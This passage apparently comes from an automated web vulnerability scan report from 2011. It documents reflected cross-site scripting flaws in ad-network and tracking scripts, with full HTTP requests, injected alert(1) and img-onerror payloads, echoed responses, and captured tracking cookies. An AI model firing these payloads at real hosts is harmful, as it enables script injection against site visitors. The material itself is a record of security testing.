rsiPus_vmwK="MLsXrrXu5hpv55C26tEiZ7bb6/4BtDlDtBB7zJPXn//lVupTzteSaDp+hCdybFqQKbgltSXX7TS7cgpzBrMBqaX8BzI1El6xTcZ2tmL8p8FopCvNGVgMiGp6m4WCGIDFz8s6bTEuRjHxHPwOUNL0PcgRhRWlj1o4UumrvZyMkn3aP/vekZ8k2DuPgo+z/A39akXZi/ljXBUEaLQDVotjGaU7XUCLvlphb90S1eXTX0lXvPUbPuB/HDDCWEVBlOHaeZVhRHMJiX5l3JmB+3axz/Ui88uMIrkgAXKVkg95FsGwcmCDb89v/jzJdFtPmz2lTWjSXA2GAEGF2s2Gzy2XMW6aXkVgfMYkWFgY2QaBYyFQYKtl+VIFFsZKmYO3w+FLw00k+llEUMAfRDbdHALC7vqvt2bQ8sMDY4yRFE/Az5AntJYRe23PUcJJlEcIc2YEr8Yi/HUoJU5U6n8KBuOA4mYPa3KLA6lu/n21W0CPnzRnQG2yRQ6Ej+tl7x90It9JLWCfCKptqpQWafYwCiT4TTN22AuKAcC7IOtgX7TrafAV5WsY/eNZ34vO9nfKqIKWwMCZWm0r6zvGiAVF0ZPc6C8r2kYL0MDkSz2QW0QBpDfnH3hQvUZlHM0IpaJ0CSR8HpGqYy7KqmHS/+NMGs55PsIQDo0ryYcXH5mW0TR5KRjaqO3abrfqnlU2LE0c2u30wuHAYNMWF0LeVEPUAp4GoPAYNu9+PepLNp8bQMXAqcDxYAc42Wqsc7UBi15FlPj1DhOKgrZikvlrfF6EiJHtYhSIrI5ptKddef7W1QSUXTiycBHBnbq+JZxfNtzdJJr8yriwxXiqmUOPxnKb9G/MXiLG+1WlXsUPH58ku4hJp65d5Sk3ZElQ4TKTA8R+mYlLozjbJHFZIVfOdThOuIb7EEmB8xzgu6OfQjFMhrUtmFajDQYlNsc5g4Ys33ak6g10RaThgjQOd3652pWs41+iQ6pyOZTWooJozs3yri0lPlPN0tpQ8j38th2sgYuOzCnAmbJUqnCCwPuHLfBM70OiKvcQBGxAXJnvnrw/0Z5VD3WoQRgstWTQe43xxXY4VkU//OiDlE040pQUkIIucnFzVa6dfCFMzQDg9ODeOkuPYnkR39oaHdcxilmAhaYLhkUeOccQPMFQxb9ty6KuhMrv5GvxcXLjAotxD3c4nqGR1hd+e+VbX6yxEG5R/HK+Xf3HmfJPUgXJ1BhBM4+byNW85rw="; rsi_us_1000000="pUMVIylDPxYY1A2wm50pnGGQ0zNpHybC/Epid4ekCKb0JoxyRDpE1XLlA0bzx2GBirrrtvFzmqtt2d8vyVmd1RHWYUkCyaVIm4arMZk3Ricz7TwST5R/SRE4auSU/cOsRSvgJ4kCtpLhZTSPij4653OLLrl6lZ7mE34xzvwEXpU1cHLKjnk5qgcOGlPGkPMQ/HaqKBYsAdwXVqee4J4iGmQJS3v57ByNA59iLDwM9qhwnI901ZX2tBrFVU79Ne9JTIhu6rvRsz+bXaFr3H1pznbziOb3i1UjPs+ep9xC9jjdCwsXKQqzVPYTPp76iBzukmgXo0EsAldCp+C6CONzhs5gC1UVd+t2+0OHz3rE9jCRxAUl3NyPfm2+xej4I0U8fJZpFLkpdKO4TRFUAc5SNTomthOfLQaUgjWrt3dowvlz54LFh+bj/OZ15BVdDDhKwXvy8y7fXsV6Uyc7Pt5Xqagafj2t4I+Xsr0K3yL+Q2sli8SfxqQ3CZOdou4ftQSO9oG1iUquSihov7nmtxdclJem7gBbgdgDtBBUTJM+RYtsDjLvSfQewZ3UjX6zisvY2GKDEdu9RTl0MxpzvERD3CvfjRQtpEcgbAJFuN5btC8Xn7odks/OBZv61oGRPfIeea5CFKm9rx+0Dy7tmUzy/RNf6kqCtyXxKf+qJWk3mcVJMTBNQ6OtIHGtaU/GyYyIJSB/IuxHyEmU7cdH+WFkgcEAjBHR5ALJKNuxpIgKNSsDe1L/E23x0BWnfo5PpaT1RRr+F2NsPswP+1EA81TcUzuU7oVW6YeYIyc1EJPAxlGzB49O1AsfYyNPIO+f/RzXBGhqlyWsCQ/zuZUOnNCBnX2Yaof/7/xiz3U4MAdJxDqq/ieZyTNh8d/+LzUIgjCyRjEvx0DGcxmtAyq6xL0Hq2CPmaJOlPcXrlUM1VPP8Rf43xcGMvBW6DMbNQIj0FDKA5/4BSvl1LblaIP4lSksLW9kClFy9doAE+pOm5+8Gnjv9DuolXIyCXBvRw3U7aqAzLJu41qvCkoGYosjRwWWymQQLKcyQdsHRPIa+Rz3Ej8e5VUYYGoFEkaV207qpc4moaV5bH07c88ON+zpor6jFm8nBx2ZuZPcuNjPxItOPfkXLyvEzUC2xzKqZZJEUiEFxkVaLbTmqPidLhAcyPppqdpTiLuWXFNDPrURsRd14Px6fibj/1Z9c1WX5qu8YkaatZsD8r3FbD2SIIBY20qTNQ/T30aWYwhX1YsjmbyIwHeYwnIvOm4ETn9EFZeU9J8g6qjJsImu6wr3rnKKsvOJsMxb8Fav6s8q4TP/2+aAt3vVgK6UTD8nG/6Xn2x97QSym/22URkM//YbVf6AE7spJpuvezT484jHjLoE09vEXOZ8je+GTcegSu1087rdhqbG9g4C4AJfcEIT2vNi/yomqtcxxbElbMnRbPsYmbgbYaz4hsSgfdeyNQ9waSpbmk2cHSArPM3RakNfwBfEbewBzPpnTbb7ooon0OG8nmLIyzlGsX82m9hyYYLvvCrgQoAvc/cFOoNDMGr+cavibJVd083DBkjLwT8YwOSjCaNTYl2z4XVawbbgaSSvpRuyntJVYZkJVbWQd9S4tBV6tMdJa8Lw/yYNLygb40zddtYRLWNfiVtOE0d6KF305ookVV8nkIbOVjEV4pZLcWPNfJ9UBYl2AEo="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4z+huXIMJ/C1v6FY5BBd22rMpqLhiql/k32IlwMqsneLA7NlzsN5SuHyX2BRF5d65SaNq4yWbBkXQPF7ywJCkw+8fee+Ci1ww4TAIgmBv1Im4IlAyckkFDdZMtEpXiKykk7RoRoFR3oIbR9oO36G6jQquAAjRV25uQHpxKsSbL+Xbpak7/UAb4VY2+Doq58gE6rVzqShFUnu/GeSoBK3FzAQJ4tm6F6+kEV9xIBYDOlLycg+EHCW9SoOK0Da5RrJESR/YCuGWG0X4jEmEemu2r3fG81Kl+H2tkU/7Fupph24Qe2xvtnIX92P2kupq9TJAmvsFIdb6VChs3aYXPBBsKv9JceLT0rXL3r3JqW97t2CNejZJFPqnREALlJkZPimruVQj4CdDasyqHe4qRakKVsk/mA1tXedBz2im5lPQYJh8Iw2kAir007vHlWYJltd9+zB+IogciCvrgYiaiylWplquvfN/YhlZAVyekhcf0/4m3lfxetxVytKCNGRB1eKSptqXsDkBKyzcaJYzYt7E7aUD3ZKN1AAkIco2Hm5fl2ZfyqiP577826hhEMg3Od9PIFhqTbxzd/469rFly/bsvXdR/PZITutLSC2TfN4hB7XY8M6NPQgWWBNbZf/Yl/JQEuTHXfPyCZ0Bp176rqcZUbj0ScrxUyg88l6UeTGPFLBj6e4KLW0doQpigZdTkkduROK9j474Wdxfua0yYnzs8X0b04W7javQJ7WOaeFm6FL; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rtc_d44E=MLvv+TMxJwpp57ZMgsy+HL46kVzOOiPPUcJ+uBKtmEX1VByaq/9AUKIs0HZ+qXc3ULzDMrpAOuA1SORKZMVFqn1/fulfwQn169qp7ektovhmlWeVvl838cTRblykoKfcThr5ejGFw4uU+vbQl7h/F9CponKLBAD7JWw+yhtdsz99QcPS3KgP7ewOHVTUb19v+ahofzBjNRanpG9lhNZ6hOSFqyzNAq1aazQaaRglrOI2OYV+XdKhTzsByBFeFQvSu5IK9iOyAiir8GRGj38Yb0X4fWzuYCiCHCRUB98/WhU1iYcdwgYSKIYa+e+tuZvV1P559ileCusaD8iVysRPHCvNpWGb/xSuCOiE8hWPaWyr8n2nII1aagnhflEN56MLzK5vxla88J12oBmd/W4UbgwixvZZU4A7lz7MpnUe/2pGOTKVu0hFakO0WpJnpsTu8oiq0cVoVPUQsSErgpyG+o8G5QBdNpjnJcNhb6gOjgOHSiLKRjmbqRSOtP9N/PtQvstizrD7R5xUTjVZLNBnOO2w0gm8Csq5yt7xJisry/PkUNJ0yzks7Q7fHZOLfHAphta/XnKZYhCak+blGaow1GNK8r4jigyQtAdK467ONd+zbNzgxN/tfT8J/3ggBsArtD8yQ7ZafiB+s9ysUrzeSGHicaH2zJ9Ej8fQH3j0Kgi39TIStMq6Cu3/HEcW/5FkpCQrIF1qcFU7Vso2qEPo76BGnwCyThkslstBhkUJzMvfo895cDToxjvyBZ7DwVpuojf47HvSM6342YSix/i2wME0fpeWKpZotkSAiHSGeNrbMfD7Ml1KHi6xCvbvTXkgCB+6LCvCHec+fDRpZtEWafluWfN1Z6pRuuL/kgggylFjEipgNe/xrIIKh2sYp5rcYqDGS+F5/EzihQM7F5tI8I9bUhl/2GuMP2yaAYGEEbkYeAtkhheGnN0dgM0IoyPTEzSq3tIgXgvPKuWbL9150adnRZZpgRdGW2xhUR/IthHG8bEMDhn8SHNzKv7sCMNvGkGLzMZGwpiAfmt69vA/44q9Vkh3cu4Vc4Rgo64CYx+JotnDWJErygyiVXspTZxFGtCbqkTT985QTmmU/mKICYiVeZ7eZ+FZo/bZpyWBKbW6teSVmlTTa0Y5gEHUcRLJTLA+AbqPbiv1jeCE+/PaYt+0f6JqX0UYMF0jGsKFCD+UOIoEViVjK/uM2pVK3A9302pYOeByY68t3SPZVC2TIB0zuAMVJthdg7vExsjJsVHK4re+h9PieH62ffvhtTcjwg2Lc+WlZ16GxCVyoTjzjvyV9hWNB2SagHKVJYlKLAlJgmOOKOG2c9rBUbeXd5H6hR0iCVSF/hLGAcg6blH40F5DTI1Xhyo/yyqHA4TP91JeABy+aoKe7gNtjpOLNsE2iHQvtTaHPY5uPSUzGakcld0SaS5By38NSIxyI8c7lS36QogjkfLjEMMmXf6xt5SLxYPH8GyUZQAG9E7KX4AGUPwe9ofuVscXw10ar0nqaNDudftLlTOiuct1qtMyWDTZCEQ7Gz62ys+nzye3VzEWo++jIhEzQmGzd9m8sxSxX+fTJS8zEAGXiMU8B3bFGfQIkLunADF/N8UQ9hFEVFAz2eDcLOpEukCzDVbQMVooFvIpdy0RtoH5NqLNs/9/k08CrMsn4ITOkUbQKdkVff7qyGKO9gaunpj15x/G0UrLtCl68k6n/j2sHqNOtLLNbB/7Ecbwpvtnmti2V4gXN5aOlGnRqu8s2SS+yz7avAbPTY0NdQF+ziSW/tOLm03985uRxnpg+WEzGtI8KJQq5MrrJVTy2d7o0v6HKICu9RZTyxFzcsAiS7FDNEG69SxiC/Q75Ulp0a1FFgo02QYqqsWIagp/+xII26P/uAxfIa8Hbdmg1cbgo2RmRC+NEU7hhNFOYvlv/SCgXWbeYJ4jwODmH3IGYv5i03EMfoOT4O3hSelSdx5n3OFRLDsjOzMbapEv8KEFthshrCm0asg9GXxQeZFJgf2KlOyYaIak2kACf5hi8szeuNcnpodhuD0/fUrpXEEknZLoOtwxDZRrK4JXmh3Mn+K2263DSrYfCsS+6qigiptybNreAcJQN1096ow4O921Cf58QuycUIVmQW+z49xZAZy/oB1OcczatpcaB0DGTGhkqSzcVBGy+geyxR0dTBLJbkj7or82pxBXPwngngg358MVNxNFMQq32AWsGQOw+dH/Hu/5X9SET4jmcNa7QFi/FcfwzLFhGXOW79rkLeUSyqF4HD+pSd9RXSZogQ7xhKoMH63rMhA5MpncgaRcUJyiWi6vlRMxu3sKtF16QhEC3BoTBlNALo76jvOmPzhUTakfGRaJKuk2EP5OmlGm2xNvPSqBkf24A3r9d8J5ksbjiJIUlQVqcwh22yGSxLI4fGw32QT122Gq0GRWVfYWq4uTEBrceDQ=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 11:03:13 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 11:03:13 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:13 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J07717B4693<SCRIPT>ALERT(1)</SCRIPT>358699D24A2" was not recognized.
*/

4.111. http://kona40.kontera.com/KonaGet.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona40.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc76"%3balert(1)//9f187d63db2 was submitted in the l parameter. This input was echoed as dcc76";alert(1)//9f187d63db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76"%3balert(1)//9f187d63db2&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1532

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
uestId="113351171490846325";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76";alert(1)//9f187d63db2&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

4.112. http://kona40.kontera.com/KonaGet.js [rId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona40.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c70"-alert(1)-"e6f81577124 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=099c70"-alert(1)-"e6f81577124&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1515

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
cardresearch.com/beacon.js"}]});
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=134803&layout=adlinks&sId=&cb=1305200317&creative=L&cn=us';
konaTweakMode=620822530;
konaRequestId="099c70"-alert(1)-"e6f81577124";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&dc_aff_id=");
onKonaRetur
...[SNIP]...

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 was submitted in the vid parameter. This input was echoed as 8aecd<img src=a onerror=alert(1)>a8888d3a2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null8aecd<img src=a onerror=alert(1)>a8888d3a2d5"; Expires=Fri, 11-May-2012 12:10:32 GMT
Content-Length: 63
Date: Thu, 12 May 2011 12:10:32 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

_lf_vid='null8aecd<img src=a onerror=alert(1)>a8888d3a2d5';

4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c73'%3balert(1)//a585ca03c5d was submitted in the admeld_callback parameter. This input was echoed as 89c73';alert(1)//a585ca03c5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match89c73'%3balert(1)//a585ca03c5d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:29 GMT
